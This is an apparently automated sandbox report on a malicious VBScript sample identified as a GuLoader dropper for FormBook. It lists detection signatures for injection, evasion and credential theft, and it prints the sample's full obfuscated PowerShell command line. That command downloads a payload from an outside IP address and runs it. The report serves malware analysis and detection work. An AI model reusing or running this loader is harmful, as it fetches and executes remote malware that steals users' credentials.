Edit tour
Windows
Analysis Report
FTG_PD_04024024001.vbs
Overview
General Information
Detection
FormBook, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 3680 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\FTG_P D_04024024 001.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 4268 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Hovedafb ryderes = 1;$Dives=' Substrin'; $Dives+='g ';Function Rumper($N inox){$Tom atillo=$Ni nox.Length -$Hovedafb ryderes;Fo r($Skumle= 1; $Skumle -lt $Toma tillo; $Sk umle+=(2)) {$Tiredly+ =$Ninox.$D ives.Invok e($Skumle, $Hovedafb ryderes);} $Tiredly;} function F unmaker($F edtsyrers) {. ($inclo sers) ($Fe dtsyrers); }$Wacky=Ru mper 'BM o ,z iTlnl a / 5 . 0 ( W i,n d oHw.sI UN, T 1.0P. 0 S;S WNi nC 6,4,;D Sx 6,4T; r,v L: 1N2I1J. 0.). VG.e .cFkCoS/ 2 0,1S0F0 1 I0r1E LF,i Ir.e fSo.x /R1.2L1 . 0 ';$Sial s=Rumper ' TUBsNe,r - LA.gPe n t U ';$Mucor mycosis=Ru mper ' hRt t,pt: /./ .8O7T..1 2 L1...1.0i5 C..1 6s3A/ ,S.t eSr.e PoSt,y,pLe Or iun gIe n,sB7 2 . ,x,sEnL '; $lecideifo rm=Rumper 'G>U ';$in closers=Ru mper ' i e ,xS ';$Sal rs227='Rev anchister' ;Funmaker (Rumper ', SMeOt -,C. o,nZt eSn tF -.P.aUt Ph UTG:B\a DSi,b r oO m,o b e n zPe n eC.F t,x t - V AaPl uLe $JSPa lUrK s 2 2 7T;s ');Funmak er (Rumper 'pi,f, G( ,t eBs.t - RpAaDtSh. TTP:c\RD i Ub,r oGmSo FbAe.nPz e Sn,eE. tTx ,t,) {DeWx i tD}C;, ');$Southr ons = Rump er 'Te.cMh Oo. ,%Ba,p ,p d aKtWa D%I\HA.r g ,eSaRnA.OM e nC t&s& D eHc hKo $ ';Funma ker (Rumpe r 'S$Cg.l. oAb,a l.:. U m oBtLi vSeSr eVd eBs =K(,ct mFdF / c , $ S oSu tk h.rPoCn,s )U ');Funm aker (Rump er 'F$ gNl .oUbTaKl : GDse,f iTl .e.sV1 2 2 S= $UMMuIc SoFrPm,y c So,s,iUsp. As p.l i t E(,$ l eTc XiLd eGiBf Fo.r mT)M ');$Mucorm ycosis=$De files122[0 ];Funmaker (Rumper ' $.gFl oDb SaSl : GGr Ra,a,l i g sPt eE=GN .efwk-.O,b .j eCcJtW HSSy sNt e .mE.XN e,t G.DW,enbNC l,iLe.nOt F ');Funma ker (Rumpe r 'S$tGDrS a aRl.i.gE s.tfe...H e aAdSe.r s [ $CS.i aSlBsS]A= $HWSaLcckS y ');$Folk ekongresse n=Rumper ' uGpr aAaAl .i gTsHtde ..aD,oSw,n l oRa.dKF ,i lMeS(H$ .MBuUc,oFr KmPyEcroPs ,i sR,C$Sa fGm,n.sUt MrKeUnRd.e ms ) ';$Fo lkekongres sen=$Umoti veredes[1] +$Folkekon gressen;$a fmnstrende s=$Umotive redes[0];F unmaker (R umper ' $ g,l ofbHaW l :.f rSi. t nLkSeRr i =K(MTNe s tQ-KP,aS t,h T$FaTf Gm nGs.tGr zeMn dSeMs )P ');whi le (!$frit nkeri) {Fu nmaker (Ru mper ' $Dg .l o bEa,l P:SP.aRr k Je,rHiHn g JsFsGkUiTv e.n,=C$ t r,uRe, ') ;Funmaker $Folkekon gressen;Fu nmaker (Ru mper 'TSNt KaLrst -GS Sl eFeNpG S4A ');Fun maker (Rum per 'R$SgA lBoPb.aClE :Cf.rkiTt nTk eOr iR =E(NT,eUsF tF-,P ast. hA $.aCf m PnCs t rCe nGdIe,sE) H ') ;Funm aker (Rump er ' $Ug.l MoSbHa lS: B,oDl dDg Ba dSe n = $,g l.oHb FaDlU:UB,r Pu,nZk uBl s,l eBj e RtB+H+K% $ DDOelf,i l e.s 1P2S2 .Rc o,u n Mt ') ;$Mu cormycosis =$Defiles1 22[$Boldga den];}Funm aker (Rump er ' $.gOl PoDb.aNl : UFVrSe,mLa DdUsWt r b e n d e,s R =B KG e tN- C.oPnZ t enn.tS . $Oa,f mTnZ